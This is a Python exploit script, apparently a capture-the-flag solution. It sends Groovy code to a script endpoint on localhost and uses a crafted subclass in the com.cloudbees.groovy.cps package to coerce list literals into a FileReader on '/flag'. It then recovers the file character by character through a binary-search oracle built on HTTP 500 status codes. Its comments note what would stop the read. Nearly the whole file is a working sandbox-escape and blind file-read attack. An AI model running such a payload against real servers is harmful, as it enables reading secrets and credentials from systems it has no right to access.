exp_read.py
from time import sleep
import requests
# Endpoint that receives the script; this copy targets a local instance over
# plain HTTP and sends no credentials.
url = "http://localhost/"

# Groovy source sent as the request body by check(). [SKIP] and [TARGET] are
# placeholders that getexp() substitutes before each request.
#
# What the script does, as written:
#   * declares SerializableScript in package com.cloudbees.groovy.cps with a
#     (FileReader, Throwable) constructor, and a Subclass whose constructor
#     passes the list literals ['/flag'] and ['114514'] to super()
#     (presumably relying on Groovy turning those lists into the FileReader
#     and Throwable arguments -- confirm against the target's Groovy/sandbox
#     version);
#   * skips [SKIP] characters of the reader, reads one character, and throws
#     only when that character's value is greater than [TARGET].
#
# The throw is the whole output channel: one bit per request, which check()
# reads from the HTTP status code.
# NOTE(review): on the server side the signal disappears if script failures
# are not distinguishable from normal responses, and the read itself is
# stopped by whatever keeps request-supplied Groovy from constructing a
# FileReader.
exp = """
package com.cloudbees.groovy.cps
class SerializableScript {
def x
def y
SerializableScript(FileReader f,Throwable t) { this.x = f;this.y=t }
}
class Subclass extends SerializableScript {
Subclass() { super(['/flag'],['114514']) }
}
def e=new Subclass().x
e.skip([SKIP])
def c=e.read()
if(c>[TARGET]){
throw new Subclass().y
}
"""
def getexp(pos, target):
    """Return the payload template with both placeholders filled in.

    ``[SKIP]`` is replaced by ``str(pos)`` (how many characters the script
    skips before reading) and ``[TARGET]`` by ``str(target)`` (the value the
    read character is compared against).
    """
    with_offset = exp.replace('[SKIP]', str(pos))
    return with_offset.replace('[TARGET]', str(target))
def divide(start, to):
    """Return the probe point for the half-open interval ``(start, to]``.

    The offset is half the interval width, truncated toward zero by
    ``int()`` after a float division.
    """
    width = to - start
    half = int(width / 2)
    return start + half
def check(pos, target):
    """Send one probe and report whether the server answered HTTP 500.

    The payload for ``(pos, target)`` is sent as the body of a GET request
    to ``url``. A 500 status is taken to mean the script threw, i.e. the
    character at ``pos`` is greater than ``target``; any other status
    returns False.

    NOTE(review): a GET carrying a body, repeated against one path with a
    mix of 500 and non-500 answers, is what this leaves in an access log.
    """
    print(' [+]', pos, target)
    payload = getexp(pos, target)
    response = requests.get(url, data=payload)
    return response.status_code == 500
# Recover 32 characters, one position at a time, by binary search on the
# yes/no answer from check(). The invariant is that the character value lies
# in (start, end]; the search stops when that interval holds a single value.
# Probes are issued back-to-back with no delay between them.
flag = ''
for pos in range(32):
    print('[+]', pos)
    # First probe splits the range at 128: (31, 128] versus (128, 65535].
    if check(pos, 128):
        start, end = 128, 65535
    else:
        start, end = 31, 128
    while end - start != 1:
        p = divide(start, end)
        # True means the character is greater than p, so raise the lower
        # bound; otherwise pull the upper bound down to p.
        if check(pos, p):
            start = p
        else:
            end = p
    flag += chr(end)
    print(chr(end), flag)